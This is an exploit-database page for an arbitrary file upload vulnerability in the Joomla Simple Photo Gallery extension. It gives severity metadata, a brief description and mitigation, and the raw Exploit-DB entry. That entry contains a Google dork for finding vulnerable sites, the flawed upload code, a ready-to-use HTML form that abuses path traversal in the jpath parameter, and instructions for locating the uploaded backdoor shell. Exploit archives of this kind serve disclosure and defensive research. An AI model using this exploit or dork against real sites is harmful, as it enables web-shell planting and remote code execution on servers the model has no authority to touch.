header-logo
Suggest Exploit
vendor:
Joomla Simple Photo Gallery
by:
CrashBandicot @DosPerl
8.8
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Joomla Simple Photo Gallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:apptha:joomla_simple_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2015

Joomla Simple Photo Gallery – Arbitrary File Upload

A vulnerability in Joomla Simple Photo Gallery allows an attacker to upload arbitrary files to the server. This is due to the lack of proper input validation in the uploadFile.php file, which allows an attacker to upload a malicious file to the server by setting the jpath parameter to ../../../../ and submitting a file in the uploadfile parameter. This can be exploited to execute arbitrary PHP code on the server.

Mitigation:

Input validation should be implemented to prevent malicious files from being uploaded to the server.
Source

Exploit-DB raw data:

######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
# Date: 10.03.2015
# Exploit Author: CrashBandicot @DosPerl
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
# Version: 1
# Tested on: Windows
######################################################################
 
# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
 
20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))
 
 
# Exploit :
 
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
 
# Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php)
 
# Shell Path : http://localhost/backdoor__[RandomString].php

Navigation

Suggest Exploit

Services By CQR